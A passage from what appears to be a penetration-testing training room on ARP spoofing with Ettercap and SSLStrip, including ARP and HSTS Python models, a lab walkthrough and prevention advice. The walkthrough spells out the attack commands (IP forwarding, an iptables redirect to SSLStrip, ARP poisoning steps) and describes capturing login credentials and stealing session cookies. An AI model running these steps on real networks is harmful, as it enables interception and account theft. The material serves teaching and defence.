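                self.alerts.append(f"unsolicited reply to {pkt['target_ip']}: {pkt['summary']}")
        self._learn(pkt["sender_ip"], pkt["sender_mac"])

    def _learn(self, ip, mac):
        old = self.table.get(ip)
        if old is not None and old != mac:
            self.alerts.append(f"mapping changed: {ip} was {old}, now {mac}")
        self.table[ip] = mac
        claimed = sorted(i for i, m in self.table.items() if m == mac)
        if len(claimed) > 1:   # one MAC answering for several IPs, as Wireshark flags
            self.alerts.append(f"duplicate MAC: {mac} claims {claimed}")


GATEWAY_IP, GATEWAY_MAC = "192.168.1.2", "00:50:56:ea:01:e7"
VICTIM_IP, VICTIM_MAC = "192.168.1.130", "00:0c:29:aa:56:e7"   # full victim MAC assumed
ATTACKER_MAC = "00:0c:29:a0:08:88"


def sample_frames():
    """Constructed capture: a normal request/reply pair, then two poisoning replies."""
    return [
        build_arp(ARP_REQUEST, VICTIM_MAC, VICTIM_IP, ZERO_MAC, GATEWAY_IP),
        build_arp(ARP_REPLY, GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),
        build_arp(ARP_REPLY, ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),   # "I am the gateway"
        build_arp(ARP_REPLY, ATTACKER_MAC, VICTIM_IP, GATEWAY_MAC, GATEWAY_IP),  # "I am the victim"
    ]


def run_demo():
    mon = ArpMonitor()
    for frame in sample_frames():
        mon.observe(frame)
    return mon


if __name__ == "__main__":
    for f in sample_frames():
        print(parse_arp(f)["summary"])
    for alert in run_demo().alerts:
        print("ALERT:", alert)
```

The legitimate request/reply pair produces no alert; the two poisoning replies produce five (unsolicited reply and changed mapping for each, plus the duplicate-MAC finding once the attacker's MAC sits behind both the gateway and the victim). Feeding the monitor live frames from a raw socket or a pcap reader is the only change needed to use it outside this demo.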

The hacker will need to take some measures before he can properly start intercepting data, but we'll discuss those in a moment.

HTTPS to the rescue ... ?

Consider the scenario of the previous chapter where the hacker is in between the Gateway and Adam. The hacker would be able to see all traffic of both parties. For example, if Adam browses to a website, the hacker may see all data sent to and received from the websites he's contacting.

What about HTTPS? That's HTTP over TLS (or HTTP over SSL). It
would mean that all data over the line would be encrypted right?
True, and real-time decryption still is not even remotely
feasible. So, the hacker would not be able to see the encrypted
contents of HTTPS-traffic.

The solution: force the victim to communicate via HTTP, which is unencrypted plain text, instead of HTTPS.

Before I explain how this can be done, let's take a look at how
an HTTPS-session is setup when you browse to www.google.com (for
example):
Answer the questions below

Wireshark summarizes its info as "192.168.1.2 is at 00:50:56:ea:01:e7"

The lower section of the image shows the details of packet 7. Here we can clearly see the sender is on IP-address 192.168.1.130

For example, if Adam browses to a website, the hacker may see all data sent to and received from the websites he's contacting

Task 6 HTTPS session setup

HTTPS session setup

Typing www.google.com in a web browser's address bar will have the browser make an HTTP-connection (on port 80) to www.google.com. Since google.com will only allow HTTPS-connections, the site will request the user to make an HTTPS-connection instead. The client will then reconnect using HTTPS on port 443. This succeeds and google.com returns its certificate.

Forcing HTTP communication

Consider the scenario where a hacker is somewhere in between the communication of the web server and the client. The hacker would be able to read the contents of the web traffic until the moment the client sets up the HTTPS-connection. After this, all data will be encrypted and no longer readable by the hacker. Earlier we stated that this might be circumvented by forcing the client to keep communicating via HTTP. SSLStrip is the tool we will use to achieve this.

SSLStrip, created by Moxie Marlinspike, will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. Let's take a look at the HTTPS session setup when the hacker uses SSLStrip in between the client and the web server.

SSLStrip
Like before, the client types www.google.com in the web browser, which will attempt to set up an HTTP connection with the website. Now with SSLStrip in the middle, this connection is forwarded to the intended destination. However, instead of the entire HTTPS-redirect-dance being performed on the client's side, SSLStrip takes care of this on the hacker's machine. After the HTTPS-connection has been set up, SSLStrip will return an HTTP OK to the client. The client's browser thinks this is acceptable since it never saw the HTTPS-redirect and will continue to communicate via HTTP; a format the hacker can read effortlessly.

HTTP Strict Transport Security

Having HTTP Strict Transport Security (HSTS) enabled for your website will inform the browser to always communicate using HTTPS. It does this via a special HSTS response header. Simply put, the browser maintains a list of websites from which it received this header. For these websites, the browser will immediately make an HTTPS-connection regardless of how the user attempted to connect. Typing www.google.com will not result in the HTTP-HTTPS-redirect-dance, but will immediately call https://www.google.com. This prevents users from making the HTTP-connection in the first place, so SSLStrip cannot perform its trick. That is, if your browser supports it.

The first ever visit of a client to a website may still be done via HTTP and an attacker can strip the HSTS header from the response. This is why most modern browsers have a pre-loaded list of HSTS sites. More on prevention in the final chapter.
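To make the HSTS behaviour above concrete, here is an added Python model of the browser-side decision as RFC 6797 describes it (example code, not from this room or any browser): the header is only honoured when it arrived over HTTPS, a cached policy upgrades http:// URLs before any request leaves the browser, includeSubDomains widens the match, and a constructed stand-in for the preload list (here only google.com) covers the very first visit. The hosts example.net and example.org are placeholders.

```python
"""Browser-side HSTS model (RFC 6797). Added example, not from the original room.
PRELOADED is a constructed stand-in for a browser's built-in preload list."""
import time
from urllib.parse import urlsplit, urlunsplit

# Constructed preload list: host -> includeSubDomains
PRELOADED = {"google.com": True}


def parse_hsts(value):
    """Parse a Strict-Transport-Security header value into
    (max_age, include_subdomains), or None when it is malformed."""
    max_age, include_sub = None, False
    for directive in value.split(";"):
        name, _, arg = directive.strip().partition("=")
        name = name.strip().lower()
        if name == "max-age":
            try:
                max_age = int(arg.strip().strip('"'))
            except ValueError:
                return None
        elif name == "includesubdomains":
            include_sub = True
    if max_age is None or max_age < 0:
        return None
    return max_age, include_sub


class HstsStore:
    def __init__(self, preload=PRELOADED, now=time.time):
        self.preload = preload
        self.now = now
        self.policies = {}   # host -> (expires_at, include_subdomains)

    def process_response(self, url, headers):
        """Record the policy carried by a response. Returns True if one was applied."""
        parts = urlsplit(url)
        if parts.scheme != "https":
            return False   # RFC 6797 section 8.1: ignore the header over insecure transport
        value = next((v for k, v in headers.items()
                      if k.lower() == "strict-transport-security"), None)
        if value is None:
            return False
        parsed = parse_hsts(value)
        if parsed is None:
            return False
        max_age, include_sub = parsed
        host = parts.hostname.lower()
        if max_age == 0:
            self.policies.pop(host, None)   # max-age=0 withdraws the policy
        else:
            self.policies[host] = (self.now() + max_age, include_sub)
        return True

    def is_known_host(self, host):
        """RFC 6797 section 8.2: exact match, or a superdomain match that set includeSubDomains."""
        labels = host.lower().split(".")
        for i in range(len(labels)):
            candidate = ".".join(labels[i:])
            needs_sub = i > 0
            policy = self.policies.get(candidate)
            if policy is not None:
                expires_at, include_sub = policy
                if expires_at > self.now() and (include_sub or not needs_sub):
                    return True
            if candidate in self.preload and (self.preload[candidate] or not needs_sub):
                return True
        return False

    def rewrite(self, url):
        """Upgrade an http:// URL before any request is sent (RFC 6797 section 8.3)."""
        parts = urlsplit(url)
        if parts.scheme != "http" or not parts.hostname or not self.is_known_host(parts.hostname):
            return url
        port = "" if parts.port in (None, 80) else f":{parts.port}"
        return urlunsplit(("https", parts.hostname + port, parts.path, parts.query, parts.fragment))


def run_demo():
    """The gap the text describes: first visit, a header over plain HTTP, then a real policy."""
    store = HstsStore()
    first = store.rewrite("http://example.net/login")             # no policy yet: stays HTTP
    stripped = store.process_response("http://example.net/",       # arrived over HTTP: ignored
                                      {"Strict-Transport-Security": "max-age=31536000"})
    store.process_response("https://example.net/",
                           {"Strict-Transport-Security": "max-age=31536000; includeSubDomains"})
    later = store.rewrite("http://mail.example.net/inbox")         # now upgraded, subdomain too
    preloaded = store.rewrite("http://www.google.com/")            # preload covers the first visit
    return first, stripped, later, preloaded
```

The first two results are the exposure window: until a policy has been received over HTTPS, the browser happily sends the plain-HTTP request that SSLStrip sits on, and a header injected into an HTTP response is deliberately ignored, so an attacker cannot "fix" it either. Only the preload entry protects the first visit, which is why sites that want full protection submit themselves to the preload list.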

The attack in practice

In this chapter I will demonstrate what a man-in-the-middle attack looks like from both hacker and victim's perspectives. Let it be clear that using this technique on networks / setups for which you don't have explicit permission, may land you in loads of trouble. This explanation is for educational purposes only.

Setup
My lab is set up as follows:
Lab setup
These are the configurations of the 3 components in this setup:

The attacker will be running Kali Linux with IP-address 192.168.1.134
The victim is running Windows 7 on a machine with IP-address 192.168.1.130
Both machines are connected via a gateway with IP-address 192.168.1.2

Attack setup
From the attacker's perspective, when we just joined the
network, we don't know anything about the network or the nodes
that are connected to it. Let's do some reconnaissance first.

Reconnaissance
We first want to know the details of our own network interface
via the ifconfig command:
ifconfig
Here we see that our own IP-address is 192.168.1.134 and our
MAC-address is 00:0c:29:a0:08:88.

Then we should find out the IP-address of the gateway by running the route -n command:

route -n
We can see the gateway's IP-address is 192.168.1.2. Now we'll attempt to discover who's on the network in our 192.168.1.xxx subnet, by running the command netdiscover -r 192.168.1.0/24. This will attempt to discover all nodes in the range 192.168.1.0 to 192.168.1.255:

netdiscover -r 192.168.1.0/24
Besides the gateway, we found another node: the victim on 192.168.1.130. Notice the line above the table in the figure above. It states that it captured 4 ARP requests/responses. Netdiscover sniffs the ARP traffic to discover who's on the network. With the parameters we supplied, netdiscover actively sent out requests for node information, quite a loud operation. If we had provided the -p parameter, it would have passively listened to the ARP-traffic; a bit stealthier.
SSLStrip setup
Now that we know the IP-addresses of the machines we want to be in between of, we are almost ready to perform the ARP-poisoning. Before we do that however, there are a few things we need to do to set up SSLStrip in preparation for the attack.

IPv4 forwarding
Make sure all IPv4 traffic is forwarded. If we didn't do this, all IPv4 traffic would stop at our hacker machine in the middle of both nodes. This would result in a Denial-of-Service attack on our victim, who would no longer be able to communicate with the Gateway.

In Linux, we enable IPv4 forwarding by executing the following command:
echo 1 > /proc/sys/net/ipv4/ip_forward
Redirecting HTTP to SSLStrip
We also need to make sure all HTTP-traffic is redirected to SSLStrip. When running, SSLStrip listens on port 10000 by default. Redirecting incoming HTTP-traffic (TCP on port 80) to port 10000 on our own machine requires a modification in the Linux firewall tables via the iptables command:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
Running SSLStrip
Since sslstrip is included in Kali Linux, running this program
is as easy as executing the command sslstrip.

SSLStrip preparation and execution

Attack with Ettercap


Now SSLStrip is running and all preparations are in place, we can start the attack. In order to send the malicious ARP-responses we could craft our own packets with scapy or use Cain & Abel. Very useful tools and worth articles on their own. However, for this purpose I'll be using Ettercap, a powerful man-in-the-middle toolset that comes pre-installed with Kali Linux.

After firing up Ettercap's GUI with the command ettercap -G, in the menu choose Sniff - Unified sniffing...:
A popup will show where we can choose which network interface to use. I chose the default eth0:

In the extended menu, choose Hosts - Hosts list. This will display a list of known hosts on the network. If no hosts are shown, you can scan for hosts via the menu Hosts - Scan for hosts.
As we can see, both the gateway and the victim are present. In the host list, select the gateway (192.168.1.2) and press the button Add to Target 1. We do the same for the victim (192.168.1.130) and press Add to Target 2. This way, we may add multiple addresses to either Target group, enabling us to be man-in-the-middle of many different machines at the same time.
After having set the targets, in the menu choose MiTM - ARP poisoning..., which will display the following popup:

Choose Sniff remote connections and press OK. The other option would allow us to only send the malicious ARP response to one of the targets, leaving the other one unmodified.
Now that both sides are poisoned via ARP spoofing, Ettercap will summarize the details of the affected target groups in its log:

ARP responses - Network traffic


When taking a look at a part of the network traffic captured during the ARP poisoning, we see that the ARP requests were sent out to the gateway and the victim:

Both messages are sent from our hacker machine (MAC 00:0c:29:a0:08:88). Checking out the details of the first message, we see its target is the gateway (IP-address 192.168.1.2). Wireshark detected a potential problem with this message and notes that the hacker's MAC-address has been seen linked to another machine's IP address as well.

Victim's side
Let's switch to the victim's side of this attack and see what it looks like from his perspective.

ARP table
We'll start out by checking the victim's ARP table via the arp -a command in Windows. Before the poisoning, the victim's ARP-table looked like this:

We see that the gateway and victim's IP addresses have different MAC-addresses (called physical address in the table). After the ARP poisoning, both IP-addresses should refer to our (the hacker's) MAC-address 00:0c:29:a0:08:88. Indeed, we can see this is exactly what happened if we run the arp -a command after the ARP poisoning:

Just browsing
As a victim, we open Internet Explorer and browse to
www.gmail.com. I was in Spain when I performed this hack, so
this is what the Spanish Gmail front-page looks like:
As a victim of this attack, we may notice a few things wrong with the front-page:

The address in the address-bar shows HTTP instead of HTTPS, while we know Gmail would usually be served over HTTPS.
More important, we see no indication we're using a secure connection, like a lock-symbol, 'Secure' text, or the name of a company.
Note that this is an older version of Internet Explorer without HSTS for the purpose of this demonstration. Just for comparison, this is what a 'safe' address bar would look like in this version of Internet Explorer:

Notice the HTTPS and presence of a lock-symbol on the right side of the address. Most modern browsers will have better notifications for secure connections. The most recent versions of Firefox and Chrome (version 62+) actively notify the user of insecure connections. It's great to see the browser companies are shifting to security-by-default, in which you're not notified when something is secure, but rather when things are not secure. Troy Hunt has written a great blog post about this.

Check whynohttps.com (by Scott Helme and Troy Hunt) to see the world's most popular sites that don't use HTTPS. In September 2018 a few of these were bbc.com, espn.com, alibaba.com and baidu.com. This is what an insecure website looks like in the modern version of Chrome:
Anyways, back to our Gmail browsing. On the HTTP Gmail website,
I'll enter my email address and a fake password 12345:
This obviously didn't work, since that isn't my real password
and Gmail returned an error stating invalid credentials.
However, for what I'm demonstrating here, this is enough.

Attacker's side
Switching back to the attacker's side, let's see what we can see
of the user's browsing actions. Ettercap monitors the network
traffic and logs interesting parts of the communication to the
screen. As we can see from the image below, Ettercap saw the
HTTP-POST request with the login details sent to the Gmail
server:

I highlighted my email address and the entered password 12345 as well. Ettercap supports many protocols besides HTTP so this log would be interesting to follow. However, running Wireshark as an attacker would allow us to see the contents of all network traffic. In the image below I highlighted the username and password from the HTTP-POST request:

The highlighted Wireshark packet clearly shows the victim's IP address as the source. I filtered the network capture to display only HTTP-traffic, but being man-in-the-middle we would be able to see traffic from all protocols. We're able to see this because the client sends his data over HTTP, as forced by SSLStrip. If the client were to communicate via HTTPS, we would see nothing but encrypted data like in the image below:
Cookie stealing
When I give a live demonstration of ARP spoofing, I always take
it a little further after the attack succeeded. Using the
information from the Wireshark network capture I can steal the
victim's cookie when he's browsing a website. Using this cookie
I then take over the victim's session and perform actions only
he is allowed to do on that site, like changing his profile
picture and description. If that user would have been a website
administrator, a hacker may do a lot more damage.

Prevention
ARP Spoofing is one way to perform a man-in-the-middle attack.
However, there are a few security countermeasures to protect you
against this. I've divided the preventive measures into 3
categories: the network, the website and the user.

Network / infrastructure
From a network perspective there are a few things that can be
done to prevent ARP spoofing:

ARP is a protocol that relies on IPv4. In IPv6 ARP has been replaced by the Neighbor Discovery Protocol (NDP), however the adoption rate of IPv6 is still relatively low. The security extension of this protocol (Secure Neighbor Discovery or SEND) uses cryptography to ensure that the claimed source of an NDP message is the owner of the claimed address.
Most modern switches come with an ARP spoofing protection feature that can be enabled to prevent this attack.
Creating a static ARP entry in your server can help reduce the risk of spoofing. If you have two hosts that regularly communicate with one another, setting up a static ARP entry creates a permanent entry in your ARP cache that can help add a layer of protection from spoofing.
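The static-entry advice above only helps if someone also checks that the cache still holds the pinned value. The Python audit below is an added example and not part of this room: it parses arp -a output, compares the gateway entry against a pinned MAC and flags one MAC answering for several IPs, which is the victim-side symptom described earlier. The two snapshots are constructed to mirror the before/after tables from the victim's-side section, using the lab's gateway and attacker addresses; the parser also accepts the Linux net-tools arp -a line format, which this page does not show.

```python
"""Audit a host's ARP cache against pinned gateway mappings.
Added example, not from the original room; the snapshots are constructed."""
import re

# Windows row: "  192.168.1.2           00-50-56-ea-01-e7     dynamic"
WIN_ROW = re.compile(r"^\s*(\d+\.\d+\.\d+\.\d+)\s+([0-9a-f]{2}(?:-[0-9a-f]{2}){5})\s+(\w+)", re.I)
# Linux net-tools row: "? (192.168.1.2) at 00:50:56:ea:01:e7 [ether] on eth0"
LINUX_ROW = re.compile(r"\((\d+\.\d+\.\d+\.\d+)\) at ([0-9a-f]{2}(?::[0-9a-f]{2}){5})", re.I)


def parse_arp_table(text):
    """Return {ip: mac} with MACs normalised to lower-case, colon-separated form."""
    table = {}
    for line in text.splitlines():
        m = WIN_ROW.match(line) or LINUX_ROW.search(line)
        if m:
            table[m.group(1)] = m.group(2).lower().replace("-", ":")
    return table


def audit(table, pinned):
    """Compare a parsed cache with pinned ip->mac pairs (typically the gateway).
    Returns a list of findings; an empty list means the cache looks as expected."""
    findings = []
    for ip, expected in pinned.items():
        seen = table.get(ip)
        if seen is None:
            findings.append(f"{ip}: no entry (expected {expected})")
        elif seen != expected:
            findings.append(f"{ip}: expected {expected}, cache has {seen}")
    by_mac = {}
    for ip, mac in table.items():
        if mac != "ff:ff:ff:ff:ff:ff":          # the broadcast entry legitimately repeats
            by_mac.setdefault(mac, []).append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            findings.append(f"{mac} answers for several hosts: {sorted(ips)}")
    return findings


# Gateway MAC as a static entry would fix it (value from the lab capture on this page)
PINNED = {"192.168.1.2": "00:50:56:ea:01:e7"}

# Constructed Windows 7 `arp -a` output before the poisoning
BEFORE = """\
Interface: 192.168.1.130 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.2           00-50-56-ea-01-e7     dynamic
  192.168.1.134         00-0c-29-a0-08-88     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
"""

# Constructed output after the poisoning: the gateway now resolves to the attacker's MAC
AFTER = """\
Interface: 192.168.1.130 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.2           00-0c-29-a0-08-88     dynamic
  192.168.1.134         00-0c-29-a0-08-88     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
"""


def run_demo():
    return audit(parse_arp_table(BEFORE), PINNED), audit(parse_arp_table(AFTER), PINNED)


if __name__ == "__main__":
    before, after = run_demo()
    print("before:", before or "OK")
    print("after:", after or "OK")
```

To actually pin the gateway, `arp -s 192.168.1.2 00-50-56-ea-01-e7` on Windows or `ip neigh replace 192.168.1.2 lladdr 00:50:56:ea:01:e7 dev eth0 nud permanent` on Linux creates the static entry; running the audit on a schedule then confirms the entry is still in place and that no other host has started answering for the gateway's address.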
Answer the questions below

The victim is running Windows 7 on a machine with
The attacker will be running Kali Linux with
We first want to know the details of our own network interface via the
We can see the gateway's
In the extended menu,
The address in the address-bar shows HTTP
Task 7 note

https://ko-fi.com/penetrationtesting

Thank you for completing this room, and we hope for your support. I hope it was of good use to you, and I hope you will support me.
